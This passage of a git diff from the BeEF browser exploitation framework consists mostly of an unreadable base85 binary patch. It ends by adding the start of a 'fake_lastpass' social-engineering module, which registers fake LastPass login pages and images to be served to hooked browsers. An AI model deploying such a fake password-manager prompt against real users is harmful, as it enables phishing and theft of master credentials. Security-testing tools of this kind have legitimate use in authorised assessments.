z*|<y6^$f0t<H6nWNUUdkxqHRGxF=ly$QQe1qT?&>aOkOF>wdYsQJ5OqLz+j$@Z6&i
zakq}1S+gOJytoW-+kPT3@P$~8l#7YevoJ!eIr6L7+TWAe?Qxu>B-!SdkrzVCR}w%T
zC4UH>Z?FNCOxVNYx6S+tY~MC_$aIKg`9t379}>%D2-PfPd<3J<hNAy#XxDL<)U9_P
zwcCPJnwUYVpYDOs6g8W{O?gV_Yr)B3U}qUG(8ACA>rr<%yzOHre+js4iV=b)2%91{
z6})!I5OP0Hg2ZkUTpz?=K72Es*JI$wu<Y;5D9wFvB_=7nb(hl9=qg29)3NP#8Jh-%
ze?FsTA>woOM$&Zy4eL}9W#ObxkGxUwN@lo6i)LldojQsl&od$WgFQphdWo*OYgW)=
zGE>}2r*z@shHheFf<Z8c2{Sf?PZ<rM?ji^L7%hv8j3f+n>p>M`@wnU~U}`_DbN@-N
zgU)6)WHlsDz;8AfJ*GYI@bdP&WaRrMKo%<5zFze!&k<)2C)t#nIXvWc)Awb4<zd6S
zIyg75(PoL0)Gn;Zh8G|FWx3X@UVaZ1IjoUE$nKB4Ep4fjF)V4NQMVt?uUGgsKOU@`
z;^dqTY)47x#z2*KiXUMyUW!g?ZqbfT!*H|=ZzGmqZnW0XUQ%RiOG}kql}YN{y5pnY
zx$}ct^0ysnY0|6E4H{PhZgN|<m~Ev`t)NH=1JmCjVl%KK7+T6Zca?6Rf9HA}gujNE
zp?r1d>TibGIXfe1F+g?q?8RByanv}eiOBCa!OC=tfC*cNXW6sxUa!JgZ5z!HcQnAk
z+8-y#y!e)6(@fAj00fGmUI9r;pP4bgWKfv@p$v4-chgnbU}#VGnHtzz5Z~76uRJnd
zC>>{|6}sx8mWO&+M{&)Fp4>Em=}pOoT3&$eb8W_tRN^e3KwjK5M5-JPcDq|3Y4wWm
zRvCMQA%=J;am*s-8+{QO8qgB<*$~}Q;)P$M&Rl^rGWazpYI|IcN@#>M`IS#?m~1Ze
zKod_0JyS0G*e%@RUSj&aSt{@Y8|(FFJK_MB$KaQS$!v(OQ$p!X77Y4(Lk~&CmarVi
zht#Vq;?*^K)T%Z#(?bLBod~I*lT)6o+H9NOmePV({Ex9&V6jX~xZ4sI%cya|0x39<
zQQVM#r(8Orsox#Qyl^9XSEtLhVqUj1Qkz>)8+A_mqhB}uKYaQ6yfK*39<cE_tTElE
z^1Tn_dAvp`=D>_ow+IEC*kveuzIzL@(3DgpDVOqj4zw7ypH#K~WYBFmGK2SpD>$yv
zrmvM_>;eow!tKVr@9ipas`+KQzdtED?E<j-TMsk!uJ$&wGfipznQ`R}T^BTNx*xBj
zyu5_OzsQEq<aQ*+%P!&`$?oa)piNr{`_sj|Lh>Hhm#XSr#`wzrwBb&X$2F9!StiN1
zoMFNe7{(t}LU&r7StUp(2<|P)dF?G~E0|p@IeteSg^i#Nz0CA&TjF`Isp~Myl9onx
z51_;hh^)&uio0^<zpAvq6gIWJpr}59#Az!6=n?25(LGWYKhH0Qy8on1X0mp*Bn--X
z*oK7&(<w;&yVDU-70>^87Q0M+>+`F_6BA~kKN3OG#?D(f3Al9=W!%Wrc2Y~Vxv6zr
zgIB2sK!lkU4;<s2-z8eCP84#I5}R8(>7g;fW;O|j0#f4glxHUs^JobfeyK$g3i3X>
zWTa%E4V|{CC%Ipc9nQHgKX1c{5#9P;Oe%GR9~a$*sY3ET|7*+V@py6#H!Z+kJ^#K?
zNo*0RIWTq6>)89wQ@LsJm&s`%Z3MrKQT6xbNR%F@@!P7n8J>tkeMFU)oA}Rg?VJQM
z;wjq@oT$=0n>3XFW8c0;=q-Kwjt^<9dMfDW%SBKHLiOo=YaU9D4{UAYX7KvxrF<1B
z9gUB;h2{w<YQnZLosga;8&Y6e<}Q)PWgsZ^;*UAO4wkJY>g$re^906)|K<B-Vj_Be
ziLj~D?ar^uGfuT9=NqReiK1*nEv-YT0iz#3GtrYqD7qgL1~RtLAYv_MB50T+=+R9t
zk5M;G8!rX+5?q-@81D@C{KZKtcp=pUd$<Q>1%wnn0wj6C-cMZ>@iKQOll1UKsN+{N
zkYX4D6>|QDZZiuMys0TXD6Dt9i4?Yra6GANm3i%=8$FH`Cthc#y+uuiN<;1mqpm#-
zJYhiE-!?~X$R>m|&+nIjsUvIj8bee+SS5k_861I>94&oX!(8XCs3}5WD@7KeVo5hc
z^NrV5nb~amds2K9hU%y$0hV8kR2MF6uRCi+FXWM}U3u9%tBy{3aJ=framfBCQUBm6
z7^_=K&AF91I}W&HaPED7KoKs$$Uwb(efN^i_I5n9I9RNCG~DXahw0$Lio9#db6F^y
z5_LGBAI|o&#VMm<2z!(R1vu|5+lPfcGz5TpeQ37sFjbH3W`}^`<K4)%VP6AfFHTiw
zbq>W&k9O}>rw4IzdU3yAOhI+dQNi)=F?g)04*w$BV5V2Z;m+~HI^_^+yNM>%xmlwl
z6(S9`KdE{R7-jm#8u1bq$h6jeorGuqI~_(dW=TyYzLvUF^fH=@z1j@=L(v*C+NOH5
z#!t!F%o#()@8;PO?0P(PW*GNZ@sjkKER?RM=79uAU@tF>=sBp>Jg7_So1G?}!n?GL
z3Q#X)#9JJZRlrbQZpdNY$}v6f^^uwuOFVz;=Wh(7-6ucRIs(W^w0YNNqq%yt0qngf
z)29ML_q%XgEh4G9SBjaG3<SU5s5x8>g1?HKAZYg);7S33hz1CiB$Zyq!+-ZJO(z^9
z-F~XYdtg~57UX6e(#e#g->pD8hSOfl#D|8;^FbQsUnk_9w3&D5y|UbGhym?9{P=q&
z@%dtRNmKe+7Lf4jT@V2c?KY=uTII85e(8I`kio<$Zy2v~IRURcDQ@4aWYTKu^<LU8
zNS%hjX()7-KX)70B&;?xf@X&vO!b3@k+cHL2L3AIDmD>@EL40~b<jTnwLxd<5s37q
zl}V<aBJs_ofirw8KwoZpQ)6y8Nl`QCDOT0Gi(#D1NE$jrVV0FL4>4<_C)Mng++vQh
z5#eOG3y8<@4#KMOdJ=II5lm4ablPmV8h`lF9rMXu*+OTt?^c_vUDT|GbxZ|&bU=^x
z-oE0qMJPPlMQ%oW%Sf*Cc-<cHM>or{2u_KJtg^fwNXSI%F)X5b8M-%ThLuH{^UK@s
zmsfXLUq1Q7r=(cW&~-)L98Pt6+?LFEqA>YA0;7*tk86HUaAz5=+Ac?=xq67BMzBv+
zdv|Uidqu~j&1b<Wyb80L`6*}y#z`6j9PfW@NuON)($SpV9vYf?Ik$qI<z?{dAUVY8
zUx``GZdK6~%JoT`lQZG()M0YZ6{e6|dIoP7_7D!kRH9Iymp5GEn7-2G9ZJi?PWaI&
zh<>9)Kl)ALI4Ba<*wo}bUTSyb7@;pBC8I}}E@2*%y*S-bfVxn`?T}Z(CN2-M!VPBF
zPbeP#kL&*TZZx+>{>Mb<lhVxoTMd~D(&aI}0&hPulVXV5+J0d*EONRDR|?YWhm;=A
zziC@X*8N9@8e&j(ekR|zWy?_yxrJ-BrP0B*4jFp5IEp1Rr>m;K8LGi<JrKE*yEllS
zKlnZZ`g9ImshsCbHnKJ7NL!x?hSRwb0T~<;DVg2pd=2mO8hRAdQphkd)6)4(gNdjg
zTL!SddYw`<0F#^BxOn`B$zWQ$kZG6EPT#W{dzQ}RujDC~s}b47DZCJiNw3EnrFuU`
z5sWjuF)jrzPgh&M>@{u%SiCYTpQ>ZiD4mCauDY=L?Y2X{Wc2F=Qoviq{>|<4i=p)o
zQlxbjmBXM`r0;mG8&e|Uvp+?XkdPSAEdPPQN)IAe&bb?GxX5J-dE84<!Z-5WU#Mp4
z+S`dZsBLX+U8|_K$l~=J-TURg@qANEz-8}4O!_gj+GHnJ^vyqnmNTz3uUDqPh&V<S
zMvZfB)(Ib-wiDnXD($J3D7_6=F}U2WH-w+H4d~Gzq}{Oof<|r9cN}`reC~787N7!B
zV6Nl3Atq}xc!9z;S)+-wAryW1q9}8Vjw;?0&vIFoZ>A3s3s6;0^so~{4&C~bSaRv^
zZ@GS@`=qQT@@2TPlEf9VRShONi=Q+Rx4m`ZqqofAcAb*eaWOQSKDw6$Ddx5ixw8Ck
z24{}424{#^GI?`ze?Vr(D<2A;!%J&r;8fQ`*oLQ+rslRI8e8U(!c(KmK6PR?H+-F-
zJ{12`JQxmpY60e`9)0Iv3dA83q~Epxg`ZqyHOY@aJrLyneY=P#TS*>I-P@Ch!&iT@
zBWMHmcy3L=h27X!F0|_|oj4~fH5Zk~s{<-aVm@43iWgDSyZ5)A_E)y}(|g7hZmI%!
z@J{WnvJ4Om(UY0yy}%U>1>?(C?aXhG<OaUv0HfD-#<s_@v619yucOmzb&bG7XLXk-
zOZJ=u4r(|=xK*kcuoI=#n8aU+(g6eHEyCz!%9Gx7LTB0+A#cxt&E%<)J>uZcmCb9s
zuJ@;ZQcz0p<0mepn97T+vRJsU1`*Y%qcFG9ZK`$b>;LR@3!W{hO{*2BN>#5`8+F^R
zSrEBBny~rb8FjDJxsEL!o*TM6l$UE(!m~w!$k1ZwHz{w&y$AfgWE^FZy;$fvsWQfD
zwi;^Fr+=`QJCM<4k7d<u9YZKV!<(=g!opooqn<85-8C^x>0_j%s2T>q$sz8#mG&SB
zH5-k9=$z}JwJ|g0xs87Z5zyB(L7Ay=;6q?l^7a*BW-2<v5|??s87+Z)U-I*U6`gd>
za`V4{MFZ*9&S$SjcX*Oq-q&tkdzoxj->QZ1<*Kv`i*vo7J;p(I-D<YYyrC%%7ekF_
zU!c$e=B&{M54_`u3={otqqXZwYa8Dta=`N}{Hpt=%wcPcMnUXyaHSd4*XX5L&Dwm2
zCWA$o{E9B^56}F)SA*Z7vM3gZ30OF4Bk~inj?a!Fnih`7mB9}jd$=L)6AD5j`4PBN
z1{AYLPHS#uQ@Hth8@Z-fzil6vp0l7s$6F5?^3Sn)Dm5^;Nfilx3wI0>Nuh>DKq^bH
zt=A4EO?)~vUV54suWAh#bUkl9jO}`DPWi~IsZl18wWHOg!6c*PRZtwIRg0UyLAa)j
z3uBKxF6yy#0h~fpP>pmTFtuG0=TtxYoPC}+C=&9z92q;~vGT;t-<Ow{+k9^J;%I7U
zWIfD|F-_>z7>lrJyiSS}PF;CdYSYuuOS86q$%^=`noV4CNS%ZYBU#I5BB3|rZs)}v
zu+5>gPd_b5@1#$bOQXOC@O-1Dt+)@aP39885(m_8A0n)UmxnE`B@C5n7MkD;7qB5v
zx5Pq}?^1B`uBwWBLq+Y`Hnx_e(~l&sMR27YSM2_NwTHvkwRw9ZK?y~zm6EKbBMpm=
z7=Zm3tbKq?)01E7j&7XK+JRZWy`$+pI|Iv?FNup~S~v^2w%(mnsEK6SaeRLC+Uh*h
zM-k;&#L9*XGU>tz`%nwhNK-?_t2aKY-6-SmLc2loqVVO1ir+7HnG+|Lmv$fiIY)qD
zsqScy)d8-GloQF=>|7kB%gEY~yDIeRZFb~%x6fcbx#_Cx80Ndh`j!sYS25b-u-M<`
z^~m3q>Bah#l*o&S<9F&iFU1K2EHWJjdBm?YW;25j2bg0$AJ*OdecmprKUy5;2DRDo
z2Wm8=$VbO4C*Gz69@dU`2V>}1kf21JS@YheHLM!vPI!JY8t8t^$}z2bPx2hz3LO_D
zQAOjjm=cC!8X|s+?j_qW8738j&T`-IjI&>^*^UH`{j`eKn&ly~Yni0rQZaPP=v-wv
zevtXW_v4PdwqfE6ljMq)e?c$f(R&3L#$X0ecoueE7A<@<giJCCWh43FbT*&P$)je_
zeUTuB+e?x0l`yuk!p>@KqoTw~eTlM<GCP%~FG-PUINer>iige2R^gjne8P`FO+)oN
zgE9BUHSYnU&6-~bPH}%zez=DRi=77K$)eAIQ9tIgcjtcKg)Q<I*u8u9GRWLfOHTfV
za%On!mJ3SoAJ_kwD@*D;ukA;0LK$PCA4y7dG#kjrMhu+G01CJ$fBbpiXh3WOxQ|t4
zcwfG*C+E;$#A2i@ssnN1cr98Gm6xQS(T_3(@n&BBj=Kij2iLH(r^k(mFQq;lz%y_j
zIJZWdEPNWSFN8ky3dQ&?D|^)4DBIv+Q7`Ln(|Tg=sYjlija<oiG?DBBc}*EhGIH4(
zq><D!F0bk<GIL2^p$etvvQ}GN&9Sen0O_Y1lYV3tEA+ulubWEZ$#mC6IVx7;pCYId
zaAok&4YwW;lhW8b5v$|eS@<~Rf1(nkDJql%p8#y<OtFMK*9!=T`rOu|$=~K+G*Iw`
zjj{9Caz6q(=&D<;A3$AC2WC|3lalZTCmlblj$i5lVqD*4a!CS<&((D(zGNYI@v?28
zl|}nmgNfccXVdy&GmHUq=$$a25B3q03ET;O=8TO5V@=oz=^vwXqsfv&+@yi;;V0lD
zqZh9bN?F&I7*o7lmbpy|OC1DDt1l`;U)Fzz^W5z-nApr*p3da!-^b;l5^~oSF*Hda
zx)kZ?B3hFen6(OqnJiy#xqB|wSl53(&L0dpwP(-C1HQ*LzdZ46@D9-~%1@5)mia55
zb9?g-Qm(89UK|CK`MpuohY$Jt>*`(Z%fofsD+mI5J<pIWJN(hMw1e=K0<cA@0rkR9
zYXm)MKcLnJqt{R;<q|JfuTo%yUp!&LiTG$cu^`2LM&bm)%Ef;`6;5BRslryhK_?F5
z=xpVij-Lx0L(=e^YZ-_795)bj>qAv42|zW`H|M4D58ee>%KXM%(WX)Ig4cZz9y35-
z85f?4K~{*%LsJLPblyW>{``p_TAq<eVql8fBzTRZ%xU*!<V5-^T2kVDhmG8cnF^<C
zaN`|jK94>rJeGqj$rzF_Oex@+ZBo|t%zUfW^@hswbu1XSj>MoG%5!i@oG@fiGT11F
zQCel!u|_8=cmt=$x5Jvd=)7hVGqQHK`*=uc>0xHAzbas?&~+y>Py^znece9l_-<yb
z|N7yl{|I1>LB2?bZO0qkgKa5=9{uX|OuaPmRv#y88C?z9`Sr3NC4tW0e?O(Lu#i~b
z<+NVwtK)C9Bn1RrH8nQ3`4SbLO~02jL(QblC10AZATGL-aWBrknqW4f_nAIIi@pok
zyVtMm<k`mX%tW-*Vwz!p>@Xl3##u+D9k@R~kJr9|ml=6gkcFdUXiTjjaTxpv#~7GU
z)FAy-GQ_#Z7PgV&uSh!=A^F4_VfkYq$5kcnih@g96&2Erc}SfFjzu;EXA8mgWjC0w
z8IWp;95a!w)P7yedA0`2^Gyed0%w%YkvG-!SLRv?5^~eCh+<>1aT(J@uO5xry<X{t
zX_LIZFN)z)Z(<g{(<NLRE)dJi$>aj?(5$~&$+CE<;AXOlKfo;8?!9)Q6`V8^PwJ-8
z@n;qJujDNzmQoR(h#aP}Z0ODAEqCH5HV|Qz1WMe8Noy?Tyu$q(o9Z`gZYx(+Z6KmK
zpexVfTdcZ7Rx^=fo&6wU^T|~6SdR*)0q}kVKZpsL-1osOTmI@Ale>T)4nITIpQiYn
zDM)ub7wP1&XAf`lxHt6{%Mv%4Q6PNdr7CWvdx3aufJ3M2J{@F}$-;$>VlB;eY;386
z_Y5rmjZkIrBQ;8#9B%H0K=fz9>%*q^=1SDkA*--ooj1K^)L3-Na8*Iby685D&*ewP
zxV0_Uo{6x#h<eH4ni$ShJUx)D5Y2Q)52jM-kb|AQ#mMvNM>F|0>~~XI87FO7Sy}$H
zT<w*r``PaJ9>?&E_}MipkiWpXJL?6(w@pE7u;nHrCN-spHVKv}KpO}6#57WfX{~gy
zeF*v&Nk#J*L$i#S@%5zZS37mVnA^sfY!E&XhT|S+;Gv$+wA$Xz&Irkk+7cI|jHX_{
zxP1OcA_${!PIQPwcHfu`El3ysz3eZ;6j!4lI*vHv7DaqQ==a^<r1{FpBRAz%J{VKt
ze~%g0vWD|s;%R9f`-zb*tZ2|%9dD}=V$~(SM`Nf2y{aifUFa0!jdR<T8YH*PQPHiR
zhBR@w?mjg$Kn?}aDx*T-=27C|=1d9e4H8PUHJuXDcssC!yTK8vMpm`b7baOG9{yT#
zA^WK6v!&6$JWLKNhNg>H3XhlSRLLIUKrqil^jtDnh_Q%j93#Ou`TpbDR!--<<D?4W
zp#{!>pS-hX6V%{KP}g%JgBz5*@d5^G&$o=1%~RFRADxYwjln!$rueYs<Lq2-R45)%
zcW`j<bJ?~D>VdwkI6Tn*)E<bP*m6`rBH4p|2{U{>hZ!uL^m|8*N~ts#enyenEm=_>
z{K2t9MT4V}?iSU9&5g=%!vFcWSns_1<DI32k|qmmP99M8XKHe4ia6k~C`1CCR+@t-
zZp_NSg5SoLS-$4a**)2Chu`|;ku9iOQqJ#tW}Y#Ux(a^j>}g&kj&X<Jom3WST*~Me
z<H<J%x%4pUk54DI9(gPJMz`b&R(0Ntf_!9D#grymCh9PL#B4YELiF|#n}5?NKCxbg
zT=t@$T~Lw$ltJHIs!y9u$sW<|RCI(2G0jg4RL92)&H%Kr#ZZ5>n|G0*YQ$x1v>b`I
z2-P^C+FN2hh5VK@fHA3u6R>p`BumBjgeq`wZjl{&#x)Lwh4hPOdjyW>1{4Mmi6uql
z2sU9!vZR&G5pn`=nQX7gKp#-%;WF|N3^_T8uINly78BdW7y4qGVhDd_c!b}ek`9~R
z<JPZWe5@6b&5^zH$29QgLrVWWLG{H>+7Z@F>4`mfp*h%fEhyW>5~-!SYvYK5(nW?1
zMF#TYc2$n#@y&hERX%&&Y$({~odGpT%?DTz^*p?dlQ_XiFK~dPRc&bCJ^HO!o+45<
zIcI)WDw@zyK=k+q^}RWv@WHAkjXq%eN*m1`PRvb?9~<Yq^&$I*&0>X>rJYSo+ZrQG
zt0Q_avG-c7h0xpl+*R|2*GU-1X2tffDLy-+s)|a2^Zc;N{@ylzsZ3Vnjk?5s+PU!l
ztQ=#f%V|q3^;9YgdCh0Q<htqmvEJl*viQB(_K&Egjsate!+e4iQikv3snyYGj5kR{
z_kEMw=JVajYDqIIS)VX!42GZ5BUv?3vs6i0nU}}$oE-65o2w0Be==*wN4he1=EGy+
zkaY}vV43UveTKka2|}FwLBv!*-k=)>YiNkU#};$@z4h)0l}0l1%#17A(Z#*T*-b~4
z&JFlBC4pKbhzcggg9s@Wp%Slndz{T9&kB}`KWJ!74%>S@+fV4c;^X$l!*;B=Y@?QK
zA<aV5tc4BAz9)}|M@>cy&Psa*ZIwziPk>=wTflO=Sb>PsMa0Z(4#nu{)##0_l>H-s
zeW&y$0u61tNBYoPe`qJ>(pr^sREJg8qPgs8u3Y+5d<_9>tDte5n<x`^HL-{Sf_Ha$
zfH~RH`_ixGyd-#fASK9V9(Q_&g?!Ns2@ibIrYev|)IsKm$8wH=%;Tbkz~eTaRst1#
z@H&P`5M@;FLe$%kQ9H+j7Z^B9E0JGt^8wkO!T@2SB{tQ_Txa`HQ@hn_U4^DZ(CC?%
zB)pMM+=BAR)D_y(dKhT2vz?nz^!0T^QyX?e?;SF*ehMmT(V4B4F(SV6kp&e2UYNzx
ztu+_;=LFUN4heSW)lDfiwT)^UFGiOrR3t&m5d5y4I53HIODmI!OoWSb)!_*KNsY2N
z#mKMqJ_v!)@~fbahu~FY(RFh2Pt0lY4Z)O|K}YM`i%p@2eiWe!gS)3P;<2$YYJ8`@
zsDr(|WyLhl(TgI5j3Q|8KxMMDt?6lPexkUEW0&iqzI0MBd<?p*+Z~YKO-5u{pvF*w
zS!7gH{j{;X;OS*Q6^6(6$Vh2r%`3i{GpCy)ZY16i;%kAyXJWFlh+3M%Ay=ViK3-mz
zSqH!YCG@9Ts-<ao-{&|N#}*CF5`-&BVd#DLL&`_cNOamogKLb1T_9r!kBFx)yhX2Y
ziyZFOY=82&U*v(~VX$o(_~}m4O9+gnWsy^|m@lrbY)yA`;3)wuluA$_{q1GrU2t3U
z6ZaTgc{?QX<0%Jr_#?KJ13birLpCD%LR!JO@;h?3X!u5rWj#kclemfesK<I2wdtp^
zqbL($ahxhOEgHvkY{keEPho?PgbO7Q+w7F+JfYi>(vl>xv9fY(+yS1Q8{dNK>Wee;
ztl<2~h%6%p`GQ75%&{PAbNUnXqJ2uw>_VjrGW9LtzPtJ59YZpx17shq1a9xC7eS%-
zDMmr3b5mfk;}9Lqg9H9w?Deu7&AMJLpjK~~2w0fHMpv%~aHiiE`HXkHbtrxnTSo>`
zXM<H4`PXQv<DwYFuycu>Ks*pAv)uPZO*^9D|8(3%IwC>|%iGQiBRNJ18opD#>pLlP
zZO=Ws8X|e=ixTN+l}WGCHT1+w)-WQdDS3<I3Oeib$G?fVTzlV*o4#H{5Y|jcMF|~Q
zV+rOLx`r+F559>POBliZO^#-%>yq+i72V(eYY>hv^tnuuYGuQt@9t)Hh=(sZ_Y=_(
zI;Q-NUwP#L1kvx~hKZ%4dRXY-pAzm&UN5nH7pdPjHq6amHC#W4c5LPuBDiLw;TgM+
zvL$kmiTGP=moH6#zr#^^L(DbZeg=5E742o{Y><wgJiP4A>*<w2t1AfaH)V9hn?(qt
zl?C^2GvnO3T+3C78FGO(UNJ)9nN(A)S9FiVT!qB7Ds>yTe`6>SnjcV&@Bg-?`oV8)
z+tVXrznQ)u$;A~IRlxGyMKu9NCtiO-ij3yPqaryQTeOB!!afRl8|ANC6@OuoSGu%l
zRRD3rqUNw;D}u9=GrW|8kHsdc)ziEqI?YV@7Y#~Gavk%NC8ReJPe@0f*aura9ic8y
zj1mueE6C9%y-ptN^5&HeA@oEj@OW`1*~Dm39Ufbd_4E19)K}8L>qFSJ_?>r%!T7EK
zfSjBxrzMhH#bTdobGh=+@OS=cF{%23_#x-*EbT}+lGt0JWtA6wT;V?!-k@|ct47yp
zuSI&;jyvqVk8MfR8M)^adKm$Cq;92-C+v`=sxNs3nE3D4sE|MTq0b#KJxXDM`@;Dn
z;c@gE;p;#ha86Tv#JYwa$RR6U<a1S2n6QG^%*)w+*eizKSojz1#E+n^FHAYIsdpu>
z6i>7B;9Z*rUjp4XzrSXHpkKlhrXxFeEOQihZkY0R`yYDU_7ZAN?pH}Jm%4-I4yoUy
zI&Y$BG5yb6VSPj4{m%4hT3(x{@9*_;D-98_cYCQ=AMM+rY%jV{0;dGOuQ#tFKWiC5
zc<O%NP|KlY>EJfZUss7$D+3#t9d1gM1<`x|YOJlj8u`45=keNdwF`X+IP`#Y{K&Qv
zf8Gl(mMCOP)GHWpTl`c1Q{R964ueW5&BsH<M5PLlfLQpq;&?XA_yCWYb7^ID)je;v
z%ImThW;1v6!o%aLzn!=5D~f`E*I$zbjs>x4w-y;~QB&_GBHP)km)ATb0?rQa4~Pe$
z$VkRHZ~4@-is4_b=WDGO?U{^YpQp$+;VE1(0V5cB!F)#A>U+5nS|KJ9r2zEUY{~Q}
zH`~=s7{TN5=P<~6un}f`t`M^vOCh@$rD__X!R?8rBtIusWx!Rum3B0;kyEuBOgO+1
z-YdO@rfj19um7Wz=!T-!u8t6ro9$?6<yYPGBt3F;f+#c56{Uy;n97q<;f^^dRl_eO
znh3U**6+`Y0+kPE1t=6xl5^i1Gq@^CMkWXjX}{fEQq0N!q#&qv8daWCWGC&OK5{}F
z9oZVqY2x>?P&JTA5w)<rp7BaeC5(-ad7T}RW9mQOzW|GKY_RjLoZ*+L%k-iDQh7KT
zO7pFflyK_1dhl0Aju%>4@<`||H|j^mPQ;)%rY}H?uPr4HluaB@&nL>wKsuL-H^w^(
z%se`i#gj}fPs4X2_NrIN5V5eJ7Pm?jPZIv5-aDf^@9^DM+4qk1n#m9xgH5ify^Y78
znn%K7xSr>D%G0DRr8A^R#I*RK&%a^=Vu`z8GV%%dZ#u8!+1~R>T3l61BrVr1`({@2
zPD(8$iwQ(+O5562va+)54pWgKX1|8XO5r;v=95sxXzDa1lsw)8$gGT7oeHbhmnN(H
zBY$9~z^WB1GE|qAmI_zr*wn8`a|kD6=|oAGsYL&Iczo?T<8wb>dwe>~0g+G5D9J_Z
zOnCVNfrU2XsVs$WbT27;hlhu4>-H$L)g{)}tmv@~WWP6S%qP-6w_k3P?9{gj)mdnd
z%EJaXSg%p}&Kl+-sTDJ|qaRM{bSrRI$|IyH(8b7c^*X&8K?6g?%@X8jp8VO)5+e7I
zambE*Q$zHGII)i_p!&bhRU6P~Cf$FScZ>D~@^OLe$xdvY$O%`3+~&)6V&&^qBCVWy
zc?zh6WK&U+xFJ8kMSKikQew(d{LRRpakbfv;9#<rbnTUIK@Sm|rgcy3xyvxFUrb)L
z!)n#k3!Ecst;jUqb^yaNNa~ltBlU3^a?hI{4FjA-AwI$Sk<4b<qm_s8oGw6ddPl61
zd7kB4N@XK{pldC7kPv~E@!%_UiDJ6n0_`dI;E4BIP;wvA-SZT9_d-R2%l6M!V<f0v
zyuhfR24Eos;jPlN;6<N|o=bGnOLk{1Q6Wrm@6@&KnaJ&~$K65wLb&`Hob3ciUQCju
zipxU01t`LzzgCu8PDV@fmQClvjTETklSw@rm&ho~=4TofOf-#&S_fP*O2=t=ny|EU
zvzg`DX6+g(DA*_qC#id8r<TJs+^VKNV>CnqymM?_(>WR@NRjw3XH1oJH}fkMdNGCU
zu&S^`?NWMP%Y*j75x*g6{ce<fu9TznLQd0w$kOYK4u|BF$ys*zhzcvWq;vagW<*R`
zaHeIVlfSr#v(C2T*8E&=8A>3f`}nZlfI$2a)dXSZzlP&wQLW=E{kO2;R#>D#nhZys
zgtureXnVzYY0C<9gysZp$Q%vp$scXB`LC<WPY-XmhE-vyrNvVy1vmm~pW8|3#c${<
zA7A;2ne8A9u8b=yLKbr`8p-t_EK<7{mV{w8%&GFdNPn@$(4!T_GE6^AHo*NZzRCa~
z%3FMkJ2x>e#C!Q|n5E-8SiD}}n#?U7Bh9x@K1#7Q{$uXoPDjk5s#uA&Cexq<P}LG!
zz+kd~?66>#c#RoQWdS`bPi@c)i@}u3UVQ!yGHc55jQ$XcM(E%z4Xzt<&S#)@3Ar#j
zOn!>Z8&-6Dhs+t6^IKg9vS|#{GxF>>Q3Qtk0(BQ`{<f8d<Tq>EzBEgA%EQx|-y4{a
z(DZ@@Ovd>K<P?njswMmm;-j&vH?^=$F57B1L7N{yWHc9WJjzt;>F*p-_O#|ktv6}<
zyz!?XrL;kX*K=G3NL${gKh)cBUng)|L>f6ef@^A7D;a9mVH0v~0pvZ}87Ir<{$-0c
z2r)Qoeg0DT`gsh^N)voBdtq-7^^={acEV8xIuG*LCP+kpmmGo5jK7tg+zMY$P0{=&
z7S;geh`AaVTt!V$YnB5Tq#wp5GhT`M<5aAhqu$2~-M$zIAp#eg3wp`<BmJaKLmLD*
zYw~KEUm9-+tQ#G@+Zs?G)JtEt;8h!InpvNXx~@MQnmbB$tl`<Nl=qCbC{Ib2BvbI5
z*dr2t$RXsyS*t-=o@b-j;ccgwi)HE0eA9eKjO-^1WKQjdT6SevY&o`)WR?Y*;*-Ss
zWsj541&Uzc2Rq0I+cAD#h!3%hPEcywHXmBwqm(yNxQz!4QrP1^pr}_awz^dcZtRc3
zD4fjo`8OxdStv#lQZV!k5EA0JUF(Mh<Cx}mH<tb(Zi)N8ql5Sxn^pKu{_VVo%Z&IC
zkj=!>-h+$&wN2=HEOYtPEDx+r2qC^ONinK00dQ1Ples_AC#=WWVR9iM!^h-1gWP_r
z#aF{}d_T8oo>I^VqhlqoM(*uv9IgJ`SxB%ZzW|Mqe`9rB%X||!74V#hh?Erj-Rh0u
zmrS>4I)p<{_xmcU?`j}VI<5rJo2G6P%HV8ek8dFQi5zi$Gly7w7LPm^I4lNR^Dt#v
zOb{o(?r_TM#luib{i(qd)9UJ?P75(I4!i52Im^PE{`VgA6p=vnqy0Rrmv}tALoHk-
z`dbn@h6(LDZ!aPV>D50kCnLu7JWO-Ufc#z{E)&PZa2;uITE^C~h1=2F@w4x0@A@)u
z-;b)`Cut>`LI|P)o`A>O+XM&A^v%W87r;^I*k!g|z}m%TUGR9f$|PB=@63u;oyG@_
z6OWfJl(<PW-lkk?p+(EmEr6pLMOQbS)Yx+ecXzmdqq{j(=I1eVyhU_c&imKm3p?M@
zkIkxA)+B@*6_^}(rQyhrBEWvHeEvJ=mn*a9j2AQavq<ip+@S0m)S<IH5qTds7@I%I
tz3JL>lmFDKX+o+_scZq=#|MTn*o)&`WS5T@{y)Fe$w(-QSBV-2{U5*=ifjM?

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_lastpass/module.rb b/modules/social_engineering/fake_lastpass/module.rb
new file mode 100644
index 000000000..3c1464ed2
--- /dev/null
+++ b/modules/social_engineering/fake_lastpass/module.rb
@@ -0,0 +1,43 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_lastpass < BeEF::Core::Command
+  
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/index.html','/lp/index','html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/indexFF.html','/lp/indexFF','html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/key_small.png','/lp/key_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/lpwhite_small.png','/lp/lpwhite_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/q3Jrp.png','/lp/q3Jrp','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/screenkeyboard.png','/lp/screenkeyboard','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/xsmall.png','/lp/xsmall','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/create_small.png','/lp/create_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/icon.png','/lp/icon','png')
